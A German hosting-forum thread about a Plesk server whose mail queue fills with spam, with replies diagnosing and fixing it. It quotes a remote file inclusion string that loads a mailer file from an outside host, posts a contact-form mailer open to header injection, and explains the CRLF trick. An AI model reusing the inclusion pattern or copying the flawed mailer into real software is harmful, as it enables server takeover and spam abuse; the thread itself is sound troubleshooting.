bin ich ein Relay?

[Gromith]

Hallo Leute

Ich habe unter Plesk - Serverweite E-Mail-Einstellungen in der E-Mail Warteschlange 2143 Mails, alle remote.

Mein Log füllt sich zwar mit Relayabwehr-Einträgen und der Server ist auch meiner Meinung nach sicher eingestellt aber trotzdem machen mich diese Mails stutzig. Einige sind bereits 6 Tage alt.

Werden in der Mail Warteschlange auch abgewehrte Mails angezeigt oder hab ich tatsächlich ein Problem?

Grüsse
Gromith

 

[djrick]

Hallo,

Geb mal folgendes ein:
telnet relay-test.mail-abuse.org
Das testet dann deinen Server auf Mailsicherheitslücken.

Ansonsten kann ich dir noch Sachen wie Greylisting, Spammassasin etc empfehlen.

 

[Gromith]

Hy

Also ein Relay bin ich definitiv nicht.
Ich habe aber folgendes Mail in der Warteschlange gefunden:

Betreff: http://www.eineDomäne.ch/home.php?path=http://www.albapow3r.by.ru/mailers.txt?[/

Ich denke das Mailscript auf der entsprechenden Seite ist offen wie ein Scheunentor

 

[djrick]

Wenn du natürlich ein Mailscript auf einer Webseite auf deinem Server hat, über die jeder Mails verschicken kann, dann hast du natürlich den Fehler gefunden und solltest ihn beheben.

Abgewehrte Mails (relay) sollte eigentlich nicht in deiner Warteschlage auftauchen.

 

[Gromith]

Hy

Das war nur ein kleines Kundenprojekt das nebenher auf dem Server gehostet wird. Das Problem ist nicht nur der PHP Mailer, sondern auch dass externer Code mit ?path= eingebunden werden kann. Habe die ganze Page mal deaktiviert und schau obs nun bessert mit der Warteschlange.

Ich danke Dir jedenfalls für die schnelle Hilfe

 

[djrick]

sondern auch dass externer Code mit ?path= eingebunden werden kann.

Das Projekt hätte ich auch SCHNELLSTENS deaktiviert...

 

[Gromith]

sh!t zu früh gefreut, Warteschlange füllt sich wieder mit Müll

 

[Huschi]

Abgewehrte Mails (relay) sollte eigentlich nicht in deiner Warteschlage auftauchen.

Sorry Olli, aber doch: die Bounces an www-data (oder wwwrun) können auch die eigene Mailqueue verstopfen.
Neulich erst vorgekommen: Ein Kunde hatte die /etc/aliases "bereinigt".
Dabei ist der 'unötige Eintrag' von wwwrun auf postmaster raus geflogen.

@Gromith:
Poste mal einen Teil Deiner Ausgabe von "mailq".

huschi.

 

[charli]

Hallo,

dass externer Code mit ?path= eingebunden werden kann.

allow_url_fopen=Off

in der php.ini (falls mehrere vorhanden in allen) und danach Apache neu starten.

Dann ist wenigstens dieser Spammer- und Hackerliebling abgestellt.

 

[Gromith]

Hallo Ihr zwei.

Kann es sein, dass ab einer gewissen Anzahl Mails in der Warteschlange diese keine Mails mehr annimmt? Habe 5000 Mails gelöscht, kurz danach flatterten wieder 5000 rein. Danach war dann allerdings schluss. Habe via Plesk allerdings auch vorsichtshalber alle Domänen gesperrt.

allow_url_fopen war tatsächlich auf on!
Danke für den Hinweis.
Ich kann mich erinnern, dass ich die Variable mal wegen einem Script testweise auf on gesetzt hab.
Da kann ich mich also selber die Ohren lang ziehn

Mal eine Frage. Ist folgendes PHP-Mailer Script sicher?

<?php

if($abschicken)
{
   if(empty($name) || empty($email) || empty($text))
   {
      echo "Bitte gehen Sie zur&uuml;ck und f&uuml;llen Sie alle Felder aus!";
   }
   else
   {
      while(list($feld,$wert)=each($HTTP_POST_VARS))
      {
         if($feld!="abschicken")
         {
            $mailnachricht.=ucfirst($feld).": $wert\n";
         }
      }
      $mailnachricht.="\nDatum/Zeit: ";
      $mailnachricht.=date("d.m.Y H:i:s");
      $mailbetreff="Kontakt: ";
      $mailbetreff.=$HTTP_POST_VARS[betreff];
      mail("empfänger@domain.ch", $mailbetreff, $mailnachricht, "From: $email");
      echo "Vielen Dank für Ihre eMail!";
   }
}
else
{
   echo "Ein Fehler ist aufgetreten.";
}

?>

 

[Huschi]

Ist folgendes PHP-Mailer Script sicher?

Nein, allein weil Du fragst.

Was mir auffällt:
a) Es wird register_globals=on gebraucht.
b) $HTTP_POST_VARS[betreff], $email werden nicht hinreichend geprüft.

Was ich mit b) meine:
Ein Spammer mußt lediglich ein CRLF an einen der Parameter anhängen und kann dann mit CC oder BCC weitere Emailempfänger und mit weiteren CRLF+CRLF sogar den kompletten Mail-Body anfügen.

Goldene Regel:
Alle Parameter (gerade die für den MailHeader) ausführlich prüfen und vorallem keine CRLF zulassen.

huschi.

 

[Gromith]

ok, hab den Mailer vom Server genommen bis ich Zeit hab mich in die Materie einzuarbeiten und etwas anderes zu coden.

 

[andy5748]

Hallo!

ich habe den Artikel bis hier gelesen, und da ich ein ähnliches Problem habe, habe ich mal

telnet relay-test.mail-abuse.org

ausprobiert, und folgende Ausgabe erhalten:

plesk:/var/mail/ham# telnet relay-test.mail-abuse.org
Trying 168.61.4.13...
Connected to Cygnus.Mail-Abuse.ORG.
Escape character is '^]'.
Connecting to 1.2.3.4 ...
<<< 220 domain.tld ESMTP
>>> HELO cygnus.mail-abuse.org
<<< 250 domain.tld
:Relay test: #Quote test
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <"nobody@mail-abuse.org">
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 1
>>> mail from: <nobody@mail-abuse.org>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 2
>>> mail from: <spamtest@maps1.pa.vix.com>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #test 3
>>> mail from: <spamtest@localhost>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 4
>>> mail from: <spamtest>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 5
>>> mail from: <>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 6
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 7
>>> mail from: <spamtest@[82.96.117.180]>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 8
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <nobody%mail-abuse.org@domain.tld>
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 9
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <nobody%mail-abuse.org@[82.96.117.180]>
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 10
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <"nobody@mail-abuse.org">
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 11
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <"nobody%mail-abuse.org">
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 12
>>> mail from: <spamtest@[82.96.117.180]>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org@domain.tld">
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 13
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <"nobody@mail-abuse.org"@[82.96.117.180]>
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 14
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org@[82.96.117.180]>
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 15
>>> mail from: <spamtest@[82.96.117.180]>
<<< 250 ok
>>> rcpt to: <@domain.tld:nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 16
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <@[82.96.117.180]:nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #Test 17
>>> mail from: <spamtest@[82.96.117.180]>
<<< 250 ok
>>> rcpt to: <mail-abuse.org!nobody>
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #test 18
>>> mail from: <spamtest@domain.tld>
<<< 250 ok
>>> rcpt to: <mail-abuse.org!nobody@[82.96.117.180]>
<<< 553 we don't relay (#5.7.1)
>>> rset
<<< 250 flushed
:Relay test: #test 19
>>> mail from: <postmaster@domain.tld>
<<< 250 ok
>>> rcpt to: <nobody@mail-abuse.org>
<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
>>> rset
<<< 250 flushed
>>> QUIT
<<< 221 domain.tld
Tested host banner: 220 domain.tld ESMTP
System appeared to reject relay attempts
Connection closed by foreign host.

Was bedeutet dies, und falls es negativ ist, wie kann man dieses Problem lösen?

Danke
Andreas

 

[Darkdream]

<<< 553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)

und

<<< 553 we don't relay (#5.7.1)

Sagt doch alles... Keiner der Tests Mails zu verschicken war erfolgreich. Dein Server hat alle Tests bestanden.